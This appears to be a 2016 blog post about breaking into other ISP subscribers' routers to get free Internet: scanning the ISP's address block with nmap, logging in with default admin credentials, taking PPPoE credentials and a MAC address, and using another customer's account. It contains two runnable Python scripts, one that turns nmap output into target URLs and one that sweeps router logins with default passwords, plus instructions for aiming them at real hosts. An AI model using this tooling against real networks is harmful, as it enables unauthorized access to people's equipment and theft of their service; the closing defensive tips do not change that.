Saturday, 23 April 2016

Hacking ISP For Fun and Profit

This post is about how I was able to hack other subscribers of my ISP to get free Internet. If you are not interested, you can get back to your work :)

*Let's start*

For the last few days I have been participating in bug bounty programs and had some success with Motorola, but I got bored and tired of testing web applications, so I decided to leave bug hunting for a while and started playing with my router's features. That is when I saw a feature named "Remote Web Management". It simply allows users to access and manage their router from the Internet.

I wondered why we even need this feature, and what use it is when IP addresses are assigned dynamically (unless you are rich enough to get a static IP address).

So I figured there could be some routers that have this option enabled by default, and there is also a chance that someone enables it unknowingly or knowingly (the static IP address people, remember?).

And fortunately (for an attacker) some thug people don't even bother to change the default password of the router's web interface, and some routers don't even provide an option to change it. #ultra_thug_life

So I decided to look for such routers in my ISP's network.

I have a DSL broadband Internet connection, so each user is given a username and password to connect to the Internet via PPPoE.

The server only checks the MAC address, username and password before establishing the session. In other words, if you can get a user's MAC address, username and password, you can log in to their PPPoE account and connect to the Internet.

So the first thing I did was go to my router's status page and check the Internet connection information.

OK! Here the WAN IP address is 172.x.x.10, which was a public IP address (class B). So we can conclude that after successful authentication the ISP lets my router establish a point-to-point (PPPoE) session and assigns it the IP 172.x.x.10.

In short, the ISP assigns my router a public IP address, 172.x.x.10, that is reachable over the Internet. That means anyone can access my router over the Internet at 172.x.x.10 if I enable the remote web management feature.


The next thing I had to do was find out the IP address block owned by my ISP.

Our old friend "whois" agreed to help me with that.

According to "whois", my ISP owns the IP address block 172.x.x.0-172.x.x.255.
The next thing I needed to do was find all IP addresses in this range with port 80 or 8080 open.

This time our old friend "nmap" agreed to help.

Note: I only scanned a small part of the ISP's range to get results faster; you can scan the whole range owned by the ISP to get more results.

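The whois and nmap steps above, as an added Python script (my example, not the post's own commands). whois_netrange() and nmap_command() wrap the two tools the post uses and need the binaries plus network access, so they are not exercised by default; web_targets() parses nmap's grepable (-oG) output into the list of http URLs the post builds by hand, and runs offline on a constructed sample whose addresses are masked the same way as in the post. The inetnum/NetRange field names are the ones RIPE and ARIN whois servers use; other registries may differ.

```python
"""Added example (not the post's own commands): whois + nmap recon as a script."""
import re
import subprocess
from typing import List, Optional

WEB_PORTS = (80, 8080)                      # the ports the post scans for
_OPEN_PORT = re.compile(r"(\d+)/open/tcp")


def whois_netrange(ip: str) -> Optional[str]:
    """Return the registered block (inetnum/NetRange) for an address.

    Needs the whois binary and network access; the field name depends on
    the regional registry, hence the two alternatives in the regex.
    """
    out = subprocess.run(["whois", ip], capture_output=True, text=True).stdout
    m = re.search(r"^(?:inetnum|NetRange):\s*(.+)$", out, re.M | re.I)
    return m.group(1).strip() if m else None


def nmap_command(cidr: str, out_file: str = "isp_web.gnmap") -> List[str]:
    """nmap argv for the scan: no ping (-Pn, routers often drop ICMP), no DNS
    (-n), only report hosts with one of our ports open (--open), grepable
    output (-oG) so web_targets() can read it back later."""
    return ["nmap", "-Pn", "-n", "-p", ",".join(map(str, WEB_PORTS)),
            "--open", "-oG", out_file, cidr]


def web_targets(gnmap_text: str) -> List[str]:
    """URLs for every host in -oG output with 80 or 8080 open, in scan order.

    Port 80 is left implicit (http://host); anything else gets ":port",
    which is the form the post opens in the browser.
    """
    urls = []
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                        # "# Nmap ..." comments, Status lines
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        for port in (int(p) for p in _OPEN_PORT.findall(ports_field)):
            if port in WEB_PORTS:
                urls.append(f"http://{host}" + ("" if port == 80 else f":{port}"))
    return urls


# Constructed sample of what "nmap ... -oG -" prints; addresses masked like the
# post's. Closed/filtered entries are included to show that they are skipped.
SAMPLE_GNMAP = """\
# Nmap 7.01 scan initiated as: nmap -Pn -n -p 80,8080 -oG - 172.x.x.0/24
Host: 172.x.x.84 ()\tPorts: 80/closed/tcp//http///, 8080/open/tcp//http-proxy///\tIgnored State: filtered (0)
Host: 172.x.x.129 ()\tPorts: 80/open/tcp//http///, 8080/closed/tcp//http-proxy///
Host: 172.x.x.200 ()\tPorts: 80/filtered/tcp//http///, 8080/filtered/tcp//http-proxy///
Host: 172.x.x.228 ()\tPorts: 80/open/tcp//http///, 8080/closed/tcp//http-proxy///
# Nmap done -- 256 IP addresses (4 hosts up) scanned
"""

if __name__ == "__main__":
    print("scan with:", " ".join(nmap_command("172.x.x.0/24")))
    for url in web_targets(SAMPLE_GNMAP):
        print(url)
```

Run it as-is to see the three URLs the sample yields; to scan for real, run the printed nmap command and feed the resulting .gnmap file to web_targets().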

I got 3 IP addresses with port 80 or 8080 open.

So I opened all of them in the browser:

http://172.x.x.84:8080
http://172.x.x.129
http://172.x.x.228

One of them was a surveillance camera, one was just a blank HTML page, and one was a router: http://172.x.x.84:8080

It was a Linksys router. I tried my luck with the very-hard-to-guess password "admin" and, you guessed it, I was in.

Always remember: "admin":"admin" and "admin" with a BLANK PASSWORD almost never fail in such situations.

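The default-credential check from the two paragraphs above, as an added Python example (mine, not the post's code). It assumes the router's web UI is protected with HTTP Basic auth; whether a given Linksys page uses Basic auth or a login form is an assumption here, so uses_basic_auth() confirms the 401 challenge before any pair is tried, otherwise a router with a form login (or no auth at all) would answer 200 to every pair and look like a hit. FakeRouter is a local stand-in that accepts admin/admin, so the whole thing runs offline; its page body is constructed and is not what a real router returns.

```python
"""Added example (not the post's code): default-credential check against a
router web UI behind HTTP Basic auth, plus a local stand-in router."""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Optional, Tuple
from urllib.error import HTTPError, URLError
from urllib.request import ProxyHandler, Request, build_opener

# The two pairs the post says almost never fail, tried in this order.
DEFAULT_CREDS: List[Tuple[str, str]] = [("admin", "admin"), ("admin", "")]

_opener = build_opener(ProxyHandler({}))    # loopback must not go via a proxy


def uses_basic_auth(base_url: str, timeout: float = 3) -> bool:
    """True if an anonymous GET is answered with 401 and a Basic challenge."""
    try:
        with _opener.open(Request(base_url), timeout=timeout):
            return False                    # served without asking for auth
    except HTTPError as e:
        challenge = e.headers.get("WWW-Authenticate", "")
        return e.code == 401 and challenge.lower().startswith("basic")
    except URLError:
        return False                        # unreachable


def try_default_creds(base_url: str, creds=DEFAULT_CREDS,
                      timeout: float = 3) -> Optional[Tuple[str, str]]:
    """Return the first (user, password) pair the router accepts, else None.

    401 means rejected, so the next pair is tried; any other HTTP error is
    also treated as a miss; a connection error ends the attempt for this host.
    """
    if not uses_basic_auth(base_url, timeout):
        return None
    for user, pw in creds:
        token = base64.b64encode(f"{user}:{pw}".encode()).decode()
        req = Request(base_url, headers={"Authorization": f"Basic {token}"})
        try:
            with _opener.open(req, timeout=timeout) as resp:
                if 200 <= resp.status < 400:
                    return (user, pw)
        except HTTPError:
            continue
        except URLError:
            return None
    return None


class FakeRouter(BaseHTTPRequestHandler):
    """Stand-in for a router status page behind Basic auth (admin/admin).
    The body is constructed for the demo, not a real router's page."""
    GOOD = "Basic " + base64.b64encode(b"admin:admin").decode()

    def do_GET(self):
        if self.headers.get("Authorization") == self.GOOD:
            body = b"<html>WAN IP: 172.x.x.84  PPPoE user: subscriber01</html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
            self.send_header("Content-Length", "0")
            self.end_headers()

    def log_message(self, *_):
        pass                                # keep the demo quiet


def start_fake_router() -> Tuple[HTTPServer, str]:
    """Start FakeRouter on a free loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeRouter)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/"


if __name__ == "__main__":
    srv, url = start_fake_router()
    print(url, "->", try_default_creds(url))  # ('admin', 'admin')
    srv.shutdown()
```

Against a real target, pass the URL from the scan (for example the :8080 one) instead of the fake router's; the function stops at the first accepted pair, and returns None both for rejected pairs and for hosts that don't use Basic auth, so a sweep over a whole list keeps going.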

Now what?
Obviously I went to the status page of that router and copied the MAC address and PPPoE credentials (username and password).
Then I logged in to our ISP's website, where you can see connection information, plan, speed, validity, etc., using the obtained username and the password "123456".
Yes bro, "123456" is what they thought the most secure password was, so they decided to assign it to every user account. Smarty pants, right?

After logging in I found out that the obtained account had a good Internet plan.

Now I set the obtained credentials in my router and ...

After the speed test I removed his PPPoE account from my router and logged back in with my own PPPoE account, because it's not ethical to steal someone's Internet.




Conclusion:

-Think before you enable the "Remote Web Management" feature on your router
-Always change the default password of your router
-Never assign the same password to all users (for ISPs)


Thanks